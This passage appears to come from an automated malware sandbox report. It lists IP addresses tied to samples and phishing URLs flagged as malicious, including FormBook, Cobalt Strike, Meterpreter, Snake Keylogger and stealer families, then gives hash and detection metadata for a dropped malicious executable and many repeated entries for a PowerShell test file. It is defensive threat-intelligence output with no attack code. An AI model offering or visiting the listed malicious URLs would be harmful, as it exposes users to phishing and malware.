                                              virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 199.232.210.172
                                              Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                              • 104.244.43.131
                                              AMAZON-AESUShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 54.90.52.195
                                              1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 34.194.69.213
                                              Money Fellows Signatures Consent Docs#122531(Revised).pdfGet hashmaliciousUnknownBrowse
                                              • 23.22.254.206
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 54.165.190.241
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 23.22.254.206
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 34.202.209.143
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 3.222.199.46
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 34.232.140.51
                                              virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 23.22.254.206
                                              AMAZON-02UShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 76.223.111.18
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 52.79.158.223
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 18.245.46.74
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 18.245.46.98
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 52.222.236.57
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 34.252.40.201
                                              New Al Maktoum International Airport Enquiry Ref #2401249.exeGet hashmaliciousFormBookBrowse
                                              • 76.223.105.230
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 3.122.190.9
                                              https://cisa2024.entegyapp.co.uk/Get hashmaliciousUnknownBrowse
                                              • 3.70.10.198
                                              AMAZON-02UShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 76.223.111.18
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 52.79.158.223
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 18.245.46.74
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 18.245.46.98
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 52.222.236.57
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 34.252.40.201
                                              New Al Maktoum International Airport Enquiry Ref #2401249.exeGet hashmaliciousFormBookBrowse
                                              • 76.223.105.230
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 3.122.190.9
                                              https://cisa2024.entegyapp.co.uk/Get hashmaliciousUnknownBrowse
                                              • 3.70.10.198
                                              GITHUBUS1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.4
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 140.82.112.21
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                                              • 140.82.121.3
                                              http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                                              • 140.82.114.21
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              72a589da586844d7f0818ce684948eea1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              48DhuEoTcX.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                              • 45.125.66.18
                                              6863(1)2.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              20240730#U7cfb#U7edf#U5f02#U5e38#U62a5#U9519.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_312.dllGet hashmaliciousTrickbotBrowse
                                              • 45.125.66.18
                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              Setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              Setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              Nakliye belgeleri.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              Request for Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              SOA-Al Daleel -Star Electromechanical.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.49
                                              • 52.216.51.233
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Reka\rapnewsa.exe1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                                Process:C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.972409904582663
                                                Encrypted:false
                                                SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
                                                MD5:2D4E723C184D9403B078E53F2DE74A23
                                                SHA1:92FA5F8F346CB987F249BD41755C5AEDAF4C8646
                                                SHA-256:0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
                                                SHA-512:A8F5267AE7F465A65A46D6ABEAED0C7A910C349E708E4264CC68747EE26DB78D62B575DEDB2E64553C207B914BA240654930774954DFA7503C93393CFADCE9AD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 16%
                                                • Antivirus: Virustotal, Detection: 24%, Browse
                                                Joe Sandbox View:
                                                • Filename: 1feP5qTCl0.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................n...............n.....n....Rich..................PE..L...PS.f...............&............0.............@.......................................@.....................................................................X.......................................................p............................text............................... ..`.rdata..............................@..@.data...D...........................@....reloc..X...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
